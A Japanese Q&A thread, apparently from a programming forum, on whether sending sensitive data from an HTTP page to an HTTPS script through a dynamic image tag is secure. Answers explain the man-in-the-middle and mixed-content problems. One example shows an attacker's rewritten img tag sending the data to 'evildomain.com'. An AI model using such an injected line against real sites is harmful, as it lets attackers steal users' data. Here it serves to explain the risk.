ページをリロードせずにブラウザーからデータを渡す必要があるサーバー スクリプト (別名 ajax) があります。データは機密情報であるため、https 経由で送信する必要があります。ただし、ページは http レイヤーにあります。同じドメイン/プロトコルの制限により、ブラウザーはこれを許可しません。
イメージタグを動的に作成し、次のような src タグを使用してスクリプトを呼び出すことで、システムを少しごまかすことを考えています。
<img src="https://mydomain.com/mysecurescript/&data=to&pass=to&my=script" />
これが本当に適切に暗号化されるかどうか知りたいです。
これに関する問題は、ページ自体が HTTP のみの場合、中間者攻撃を受けやすいことです。攻撃者は、HTTP 経由で送信されたページのスクリプトを変更して、代わりに以下を使用することができます。
<img src="http://evildomain.com/evilproxyscript/&data=to&pass=to&my=script" />
ユーザーは賢明ではありません。これを回避するには、HTTPS 経由でもページを提供する必要があります。これにより、他の問題が同時に解決されます。
(これは、フォーム アクションが HTTPS であるだけでなく、ログイン フォームが HTTPS ページにある必要があるのとまったく同じ理由です)。
はいといいえ。
URL のサーバー アドレス部分は、接続の設定に使用されるため、明らかに暗号化されていません。
他のすべては、HTTPS 接続を介して送信される間、暗号化されます。しかし、ソースを見ている人は誰でも投稿されているデータを見ることができます。
また、ブラウザによっては混合モード (http と https) の HTML ページを表示しない (または表示する前にユーザーに警告する) ことにも注意してください。場合によっては、ユーザーがブロックすることを選択したために、これが機能しないことがあります。
画像技術の可能な代替手段 (他の人が述べたように、混合モードのコンテンツが一部のブラウザーで親切に扱われないという欠点があります) はaSSLです。
どちらの方法でも暗号化が行われ、どちらも中間者攻撃に対して依然として脆弱です。